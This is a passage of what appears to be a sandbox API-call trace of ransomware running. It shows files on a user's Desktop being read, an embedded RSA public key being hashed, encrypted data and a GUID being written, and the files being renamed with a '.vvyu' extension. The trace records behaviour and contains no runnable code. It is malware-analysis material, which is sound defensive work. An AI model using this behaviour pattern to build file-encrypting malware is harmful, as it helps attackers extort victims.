lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0183.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0183.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0183.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e678 [0183.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0183.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0183.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0183.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6f0 [0183.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0183.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e6d8 [0183.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0183.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0183.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6a8 [0183.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e690 [0183.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e738 [0183.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e690 | out: hHeap=0x6a0000) returned 1 [0183.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e690 [0183.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6a8 | out: hHeap=0x6a0000) returned 1 [0183.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0183.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0183.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0183.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0183.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e648 | out: hHeap=0x6a0000) returned 1 [0183.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e648 [0183.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d37088 [0183.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6c0 | out: hHeap=0x6a0000) returned 1 [0183.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0183.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e738 | out: hHeap=0x6a0000) returned 1 [0183.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d37298 [0183.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0183.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0183.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0183.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e648 | out: hHeap=0x6a0000) returned 1 [0183.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d374b0 [0183.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0183.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0183.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0183.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0183.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0183.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0183.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d37298 | out: hHeap=0x6a0000) returned 1 [0183.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d374b0 | out: hHeap=0x6a0000) returned 1 [0183.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0183.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0183.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e690 | out: hHeap=0x6a0000) returned 1 [0183.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0183.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6d8 | out: hHeap=0x6a0000) returned 1 [0183.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e678 | out: hHeap=0x6a0000) returned 1 [0183.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6f0 | out: hHeap=0x6a0000) returned 1 [0183.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0183.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0183.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0183.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e5d0 | out: hHeap=0x6a0000) returned 1 [0183.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d308c8 | out: hHeap=0x6a0000) returned 1 [0183.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d37088 | out: hHeap=0x6a0000) returned 1 [0183.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0183.268] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0183.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0183.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0183.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0183.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0183.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0183.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.270] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4afd0 | out: hHeap=0x6a0000) returned 1 [0183.270] WriteFile (in: hFile=0x584, lpBuffer=0x2d36670*, nNumberOfBytesToWrite=0xa08, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d36670*, lpNumberOfBytesWritten=0x30ffb14*=0xa08, lpOverlapped=0x0) returned 1 [0183.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.271] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xa0d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.271] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0183.271] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.271] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0183.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d36670 [0183.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d36670, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0183.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d36aa0 [0183.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0183.273] WriteFile (in: hFile=0x584, lpBuffer=0x2d36aa0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d36aa0*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0183.273] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36aa0 | out: hHeap=0x6a0000) returned 1 [0183.273] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0183.273] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0183.273] CloseHandle (hObject=0x584) returned 1 [0183.274] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0183.274] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d36670 [0183.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0183.275] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\78tFz6xBRVYoOofh5u.avi" (normalized: "c:\\users\\keecfmwgj\\desktop\\78tfz6xbrvyooofh5u.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\78tFz6xBRVYoOofh5u.avi.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\78tfz6xbrvyooofh5u.avi.vvyu")) returned 1 [0183.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.277] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0183.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0183.280] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd64f8530, ftCreationTime.dwHighDateTime=0x1d89cbc, ftLastAccessTime.dwLowDateTime=0x30ffbe40, ftLastAccessTime.dwHighDateTime=0x1d8a0d3, ftLastWriteTime.dwLowDateTime=0x30ffbe40, ftLastWriteTime.dwHighDateTime=0x1d8a0d3, nFileSizeHigh=0x0, nFileSizeLow=0x3b3b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7rMc5PE99.bmp", cAlternateFileName="7RMC5P~1.BMP")) returned 1 [0183.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d308c8 [0183.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0183.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d308c8 | out: hHeap=0x6a0000) returned 1 [0183.280] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\7rMc5PE99.bmp") returned=".bmp" [0183.280] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\7rMc5PE99.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\7rmc5pe99.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0183.281] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=15163) returned 1 [0183.281] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0183.284] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x3b15, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.284] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0183.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.286] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.286] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x3b3b, lpOverlapped=0x0) returned 1 [0183.286] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0183.286] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.286] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.286] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0183.287] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0183.287] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0183.287] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0183.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0183.287] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0183.287] GetLastError () returned 0x0 [0183.287] SetLastError (dwErrCode=0x0) [0183.287] GetLastError () returned 0x0 [0183.287] SetLastError (dwErrCode=0x0) [0183.287] GetLastError () returned 0x0 [0183.288] SetLastError (dwErrCode=0x0) [0183.288] GetLastError () returned 0x0 [0183.288] SetLastError (dwErrCode=0x0) [0183.288] GetLastError () returned 0x0 [0183.288] SetLastError (dwErrCode=0x0) [0183.288] GetLastError () returned 0x0 [0183.288] SetLastError (dwErrCode=0x0) [0183.288] GetLastError () returned 0x0 [0183.288] SetLastError (dwErrCode=0x0) [0183.288] GetLastError () returned 0x0 [0183.288] SetLastError (dwErrCode=0x0) [0183.288] GetLastError () returned 0x0 [0183.288] SetLastError (dwErrCode=0x0) [0183.288] GetLastError () returned 0x0 [0183.288] SetLastError (dwErrCode=0x0) [0183.288] GetLastError () returned 0x0 [0183.288] SetLastError (dwErrCode=0x0) [0183.288] GetLastError () returned 0x0 [0183.288] SetLastError (dwErrCode=0x0) [0183.288] GetLastError () returned 0x0 [0183.288] SetLastError (dwErrCode=0x0) [0183.288] GetLastError () returned 0x0 [0183.288] SetLastError (dwErrCode=0x0) [0183.288] GetLastError () returned 0x0 [0183.289] SetLastError (dwErrCode=0x0) [0183.289] GetLastError () returned 0x0 [0183.289] SetLastError (dwErrCode=0x0) [0183.289] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0183.289] GetLastError () returned 0x0 [0183.289] SetLastError (dwErrCode=0x0) [0183.289] GetLastError () returned 0x0 [0183.289] SetLastError (dwErrCode=0x0) [0183.289] GetLastError () returned 0x0 [0183.289] SetLastError (dwErrCode=0x0) [0183.289] GetLastError () returned 0x0 [0183.289] SetLastError (dwErrCode=0x0) [0183.289] GetLastError () returned 0x0 [0183.289] SetLastError (dwErrCode=0x0) [0183.289] GetLastError () returned 0x0 [0183.289] SetLastError (dwErrCode=0x0) [0183.289] GetLastError () returned 0x0 [0183.289] SetLastError (dwErrCode=0x0) [0183.289] GetLastError () returned 0x0 [0183.289] SetLastError (dwErrCode=0x0) [0183.289] GetLastError () returned 0x0 [0183.289] SetLastError (dwErrCode=0x0) [0183.289] GetLastError () returned 0x0 [0183.289] SetLastError (dwErrCode=0x0) [0183.289] GetLastError () returned 0x0 [0183.289] SetLastError (dwErrCode=0x0) [0183.289] GetLastError () returned 0x0 [0183.289] SetLastError (dwErrCode=0x0) [0183.289] GetLastError () returned 0x0 [0183.290] SetLastError (dwErrCode=0x0) [0183.290] GetLastError () returned 0x0 [0183.290] SetLastError (dwErrCode=0x0) [0183.290] GetLastError () returned 0x0 [0183.290] SetLastError (dwErrCode=0x0) [0183.290] GetLastError () returned 0x0 [0183.290] SetLastError (dwErrCode=0x0) [0183.290] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0183.290] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0183.290] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0183.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0183.291] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0183.291] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0183.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.291] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0183.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.291] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3b40) returned 0x2d36670 [0183.291] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0183.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2c4afd0 [0183.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d2fc98 [0183.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0183.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d308c8 [0183.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e5d0 [0183.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30880 [0183.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6f0 [0183.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e678 [0183.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6d8 [0183.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e690 [0183.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0183.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x6d5c88 [0183.292] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6d5c88, Size=0x218) returned 0x2d3a1b8 [0183.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d3a3d8 [0183.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e678 | out: hHeap=0x6a0000) returned 1 [0183.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e690 | out: hHeap=0x6a0000) returned 1 [0183.292] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6d8 | out: hHeap=0x6a0000) returned 1 [0183.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0183.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a3d8 | out: hHeap=0x6a0000) returned 1 [0183.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6d8 [0183.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0183.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e690 [0183.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0183.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e678 [0183.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0183.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0183.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0183.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0183.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0183.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0183.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0183.294] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0183.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 